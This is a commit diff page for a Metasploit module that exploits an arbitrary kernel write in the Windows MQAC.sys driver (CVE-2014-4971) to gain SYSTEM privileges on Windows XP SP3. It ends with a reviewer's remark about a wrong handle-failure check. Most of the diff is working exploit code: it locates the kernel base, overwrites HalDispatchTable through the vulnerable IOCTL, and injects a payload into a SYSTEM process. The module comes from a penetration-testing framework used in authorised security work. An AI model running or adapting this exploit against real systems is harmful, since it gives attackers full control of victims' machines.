Merge rubocop changes from Kernelsmith

bug/bundler_fix
OJ 2014-07-30 08:35:57 +10:00
commit f3e8c51573
No known key found for this signature in database
GPG Key ID: 49EEE7511FAA5749
1 changed files with 52 additions and 37 deletions


@ -14,62 +14,70 @@ class Metasploit3 < Msf::Exploit::Local
INVALID_HANDLE_VALUE = 0xFFFFFFFF
def initialize(info={})
super(update_info(info, {
def initialize(info = {})
super(update_info(info,
'Name' => 'MQAC.sys Arbitrary Write Privilege Escalation',
'Description' => %q{
'Description' => %q(
A vulnerability within the MQAC.sys module allows an attacker to
overwrite an arbitrary location in kernel memory.
This module will elevate itself to SYSTEM, then inject the payload
into another SYSTEM process.
},
),
'License' => MSF_LICENSE,
'Author' =>
[
'Matt Bergin', # original exploit and all the hard work
'Spencer McIntyre' # MSF module
],
'Arch' => [ ARCH_X86 ],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Arch' => [ARCH_X86],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'EXITFUNC' => 'thread'
},
'Targets' =>
[
[ 'Windows XP SP3',
['Windows XP SP3',
{
'_KPROCESS' => "\x44",
'_TOKEN' => "\xc8",
'_UPID' => "\x84",
'_APLINKS' => "\x88"
}
],
]
],
'References' =>
[
[ 'CVE', '2014-4971' ],
[ 'EDB', '34112' ],
[ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt' ]
%w(CVE 2014-4971),
%w(EDB 34112),
['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt']
],
'DisclosureDate'=> 'Jul 22 2014',
'DisclosureDate' => 'Jul 22 2014',
'DefaultTarget' => 0
}))
))
end
def find_sys_base(drvname)
session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ['PBLOB', 'lpImageBase', 'out'], ['DWORD', 'cb', 'in'], ['PDWORD', 'lpcbNeeded', 'out']])
session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ['LPVOID', 'ImageBase', 'in'], ['PBLOB', 'lpBaseName', 'out'], ['DWORD', 'nSize', 'in']])
session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
lp_image_base = %w(PBLOB lpImageBase out)
cb = %w(DWORD cb in)
lpcb_needed = %w(PDWORD lpcbNeeded out)
session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL',
[lp_image_base, cb, lpcb_needed])
image_base = %w(LPVOID ImageBase in)
lp_base_name = %w(PBLOB lpBaseName out)
n_size = %w(DWORD nSize in)
session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD',
[image_base, lp_base_name, n_size])
results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack('L*')
addresses.each do |address|
results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
current_drvname = results['lpBaseName'][0..results['return'] - 1]
if drvname == nil
if drvname.nil?
if current_drvname.downcase.include?('krnl')
return [address, current_drvname]
end
@ -99,12 +107,14 @@ class Metasploit3 < Msf::Exploit::Local
end
def open_device
handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, nil, 'OPEN_EXISTING', 0, nil)
if handle['return'] == 0
handle = session.railgun.kernel32.CreateFileA('\\\\.\\MQAC',
'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, nil, 'OPEN_EXISTING', 0, nil)
handle = handle['return']
if handle == 0
print_error('Failed to open the \\\\.\\MQAC device')
return nil
end
handle = handle['return']
handle
end
def check
@ -141,8 +151,8 @@ class Metasploit3 < Msf::Exploit::Local
return
end
# Running on Windows XP versions that aren't listed in the supported list results
# in a BSOD and so we should not let that happen.
# Running on Windows XP versions that aren't listed in the supported list
# results in a BSOD and so we should not let that happen.
return unless check == Exploit::CheckCode::Appears
kernel_info = find_sys_base(nil)
@ -154,7 +164,10 @@ class Metasploit3 < Msf::Exploit::Local
this_proc = session.sys.process.open
unless this_proc.memory.writable?(base_addr)
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack('L'), nil, [ 0xffff ].pack('L'), 'MEM_COMMIT|MEM_RESERVE', 'PAGE_EXECUTE_READWRITE')
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [1].pack('L'), nil,
[0xffff].pack('L'),
'MEM_COMMIT|MEM_RESERVE',
'PAGE_EXECUTE_READWRITE')
end
unless this_proc.memory.writable?(base_addr)
print_error('Failed to properly allocate memory')
@ -164,7 +177,8 @@ class Metasploit3 < Msf::Exploit::Local
hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
hKernel = hKernel['return']
halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, 'HalDispatchTable')
halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel,
'HalDispatchTable')
halDispatchTable = halDispatchTable['return']
halDispatchTable -= hKernel
halDispatchTable += kernel_info[0]
@ -193,8 +207,10 @@ class Metasploit3 < Msf::Exploit::Local
this_proc.close
print_status('Triggering vulnerable IOCTL')
session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f,
1, 0x258,
halDispatchTable + 0x4, 0)
session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
unless is_system?
print_error('Exploit failed')
@ -207,5 +223,4 @@ class Metasploit3 < Msf::Exploit::Local
fail_with(Failure::Unknown, 'Error while executing the payload')
end
end
end
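Review bot: The failure guard in open_device (`if handle == 0`, kept by the new code after moving the `handle['return']` extraction up) tests the wrong sentinel: CreateFileA reports failure with INVALID_HANDLE_VALUE, which this class already defines as 0xFFFFFFFF at the top of the first hunk, so on a failed open the method returns that value instead of nil and the caller continues with an invalid handle. Assuming railgun surfaces the HANDLE as an unsigned 32-bit value (not verifiable from this page), the guard should read `if handle == INVALID_HANDLE_VALUE || handle == 0`, keeping the zero case as a belt-and-braces check. The body of open_device is fully visible in its hunk; a one-line comment such as `# CreateFileA signals failure with INVALID_HANDLE_VALUE, not a NULL handle` above the guard would stop the same mistake from being reintroduced in a later restyle.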